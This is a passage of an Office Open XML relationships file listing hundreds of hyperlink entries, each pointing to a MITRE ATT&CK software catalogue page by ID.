Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0194" TargetMode="External"/><Relationship Id="rId354" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0270" TargetMode="External"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0465" TargetMode="External"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0187" TargetMode="External"/><Relationship Id="rId189" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0015" TargetMode="External"/><Relationship Id="rId396" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0058" TargetMode="External"/><Relationship Id="rId214" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0211" TargetMode="External"/><Relationship Id="rId256" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0228" TargetMode="External"/><Relationship Id="rId298" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0517" TargetMode="External"/><Relationship Id="rId421" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0094" TargetMode="External"/><Relationship Id="rId463" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0412" TargetMode="External"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0367" TargetMode="External"/><Relationship Id="rId158" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0151" TargetMode="External"/><Relationship Id="rId323" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0262" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0245" TargetMode="External"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0351" TargetMode="External"/><Relationship Id="rId365" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0063" TargetMode="External"/><Relationship Id="rId190" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0389" TargetMode="External"/><Relationship Id="rId204" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0387" TargetMode="External"/><Relationship Id="rId225" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0443" TargetMode="External"/><Relationship Id="rId246" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0553" TargetMode="External"/><Relationship Id="rId267" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0368" TargetMode="External"/><Relationship Id="rId288" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0145" TargetMode="External"/><Relationship Id="rId411" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0436" TargetMode="External"/><Relationship Id="rId432" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0386" TargetMode="External"/><Relationship Id="rId453" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0041" TargetMode="External"/><Relationship Id="rId474" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0071" TargetMode="External"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0038" TargetMode="External"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0036" TargetMode="External"/><Relationship Id="rId313" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0393" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0584" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0014" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0462" TargetMode="External"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0054" TargetMode="External"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0243" TargetMode="External"/><Relationship Id="rId148" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0249" TargetMode="External"/><Relationship Id="rId169" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0047" TargetMode="External"/><Relationship Id="rId334" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0481" TargetMode="External"/><Relationship Id="rId355" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0090" TargetMode="External"/><Relationship Id="rId376" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0519" TargetMode="External"/><Relationship Id="rId397" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0188" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0045" TargetMode="External"/><Relationship Id="rId180" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0537" TargetMode="External"/><Relationship Id="rId215" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0362" TargetMode="External"/><Relationship Id="rId236" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0339" TargetMode="External"/><Relationship Id="rId257" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0336" TargetMode="External"/><Relationship Id="rId278" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0229" TargetMode="External"/><Relationship Id="rId401" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0018" TargetMode="External"/><Relationship Id="rId422" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0001" TargetMode="External"/><Relationship Id="rId443" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0515" TargetMode="External"/><Relationship Id="rId464" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0202" TargetMode="External"/><Relationship Id="rId303" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0013" TargetMode="External"/><Relationship Id="rId485" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0067" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0570" TargetMode="External"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0488" TargetMode="External"/><Relationship Id="rId138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0383" TargetMode="External"/><Relationship Id="rId345" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0375" TargetMode="External"/><Relationship Id="rId387" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0445" TargetMode="External"/><Relationship Id="rId191" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0044" TargetMode="External"/><Relationship Id="rId205" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0276" TargetMode="External"/><Relationship Id="rId247" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0149" TargetMode="External"/><Relationship Id="rId412" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0199" TargetMode="External"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0062" TargetMode="External"/><Relationship Id="rId289" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0223" TargetMode="External"/><Relationship Id="rId454" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0161" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0456" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0222" TargetMode="External"/><Relationship Id="rId149" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0597" TargetMode="External"/><Relationship Id="rId314" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0113" TargetMode="External"/><Relationship Id="rId356" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0358" TargetMode="External"/><Relationship Id="rId398" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0380" TargetMode="External"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0354" TargetMode="External"/><Relationship Id="rId160" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0214" TargetMode="External"/><Relationship Id="rId216" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0397" TargetMode="External"/><Relationship Id="rId423" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0178" TargetMode="External"/><Relationship Id="rId258" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0247" TargetMode="External"/><Relationship Id="rId465" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0110" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0470" TargetMode="External"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0484" TargetMode="External"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0091" TargetMode="External"/><Relationship Id="rId325" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0241" TargetMode="External"/><Relationship Id="rId367" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0533" TargetMode="External"/><Relationship Id="rId171" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0224" TargetMode="External"/><Relationship Id="rId227" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0282" TargetMode="External"/><Relationship Id="rId269" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0165" TargetMode="External"/><Relationship Id="rId434" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0257" TargetMode="External"/><Relationship Id="rId476" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0278" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0414" TargetMode="External"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0095" TargetMode="External"/><Relationship Id="rId280" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0072" TargetMode="External"/><Relationship Id="rId336" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0458" TargetMode="External"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0338" TargetMode="External"/><Relationship Id="rId140" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0503" TargetMode="External"/><Relationship Id="rId182" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0483" TargetMode="External"/><Relationship Id="rId378" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0074" TargetMode="External"/><Relationship Id="rId403" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0060" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0552" TargetMode="External"/><Relationship Id="rId238" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0002" TargetMode="External"/><Relationship Id="rId445" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0206" TargetMode="External"/><Relationship Id="rId487" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0103" TargetMode="External"/><Relationship Id="rId291" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0184" TargetMode="External"/><Relationship Id="rId305" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0012" TargetMode="External"/><Relationship Id="rId347" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0592" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0564" TargetMode="External"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0235" TargetMode="External"/><Relationship Id="rId151" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0493" TargetMode="External"/><Relationship Id="rId389" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0007" TargetMode="External"/><Relationship Id="rId193" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0163" TargetMode="External"/><Relationship Id="rId207" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0437" TargetMode="External"/><Relationship Id="rId249" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0256" TargetMode="External"/><Relationship Id="rId414" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0011" TargetMode="External"/><Relationship Id="rId456" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0341" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0373" TargetMode="External"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0593" TargetMode="External"/><Relationship Id="rId260" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0039" TargetMode="External"/><Relationship Id="rId316" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0238" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0212" TargetMode="External"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0200" TargetMode="External"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0152" TargetMode="External"/><Relationship Id="rId358" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0446" TargetMode="External"/><Relationship Id="rId162" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0391" TargetMode="External"/><Relationship Id="rId218" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0447" TargetMode="External"/><Relationship Id="rId425" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0333" TargetMode="External"/><Relationship Id="rId467" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0160" TargetMode="External"/><Relationship Id="rId271" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0352" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0017" TargetMode="External"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0348" TargetMode="External"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0512" TargetMode="External"/><Relationship Id="rId327" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0416" TargetMode="External"/><Relationship Id="rId369" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0159" TargetMode="External"/><Relationship Id="rId173" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0087" TargetMode="External"/><Relationship Id="rId229" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0413" TargetMode="External"/><Relationship Id="rId380" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0053" TargetMode="External"/><Relationship Id="rId436" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0207" TargetMode="External"/><Relationship Id="rId240" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0051" TargetMode="External"/><Relationship Id="rId478" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0100" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0093" TargetMode="External"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0126" TargetMode="External"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0186" TargetMode="External"/><Relationship Id="rId282" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0016" TargetMode="External"/><Relationship Id="rId338" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0169" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0092" TargetMode="External"/><Relationship Id="rId142" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0410" TargetMode="External"/><Relationship Id="rId184" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0357" TargetMode="External"/><Relationship Id="rId391" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0226" TargetMode="External"/><Relationship Id="rId405" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0098" TargetMode="External"/><Relationship Id="rId447" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0466" TargetMode="External"/><Relationship Id="rId251" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0272" TargetMode="External"/><Relationship Id="rId489" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0227" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0486" TargetMode="External"/><Relationship Id="rId293" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0197" TargetMode="External"/><Relationship Id="rId307" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0453" TargetMode="External"/><Relationship Id="rId349" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0174" TargetMode="External"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0498" TargetMode="External"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0568" TargetMode="External"/><Relationship Id="rId153" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0531" TargetMode="External"/><Relationship Id="rId195" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0215" TargetMode="External"/><Relationship Id="rId209" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0162" TargetMode="External"/><Relationship Id="rId360" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0461" TargetMode="External"/><Relationship Id="rId416" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0057" TargetMode="External"/><Relationship Id="rId220" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0451" TargetMode="External"/><Relationship Id="rId458" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0086" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0347" TargetMode="External"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0527" TargetMode="External"/><Relationship Id="rId262" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0033" TargetMode="External"/><Relationship Id="rId318" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0078" TargetMode="External"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0600" TargetMode="External"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0343" TargetMode="External"/><Relationship Id="rId164" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0135" TargetMode="External"/><Relationship Id="rId371" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0035" TargetMode="External"/><Relationship Id="rId427" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0136" TargetMode="External"/><Relationship Id="rId469" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0472" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0069" TargetMode="External"/><Relationship Id="rId231" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0449" TargetMode="External"/><Relationship Id="rId273" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0340" TargetMode="External"/><Relationship Id="rId329" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0258" TargetMode="External"/><Relationship Id="rId480" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0175" TargetMode="External"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0572" TargetMode="External"/><Relationship Id="rId133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0120" TargetMode="External"/><Relationship Id="rId175" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0009" TargetMode="External"/><Relationship Id="rId340" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0153" TargetMode="External"/><Relationship Id="rId200" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0088" TargetMode="External"/><Relationship Id="rId382" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0382" TargetMode="External"/><Relationship Id="rId438" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0109" TargetMode="External"/><Relationship Id="rId242" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0084" TargetMode="External"/><Relationship Id="rId284" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0254" TargetMode="External"/><Relationship Id="rId491" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0123" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0234" TargetMode="External"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0591" TargetMode="External"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0384" TargetMode="External"/><Relationship Id="rId144" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0417" TargetMode="External"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0213" TargetMode="External"/><Relationship Id="rId186" 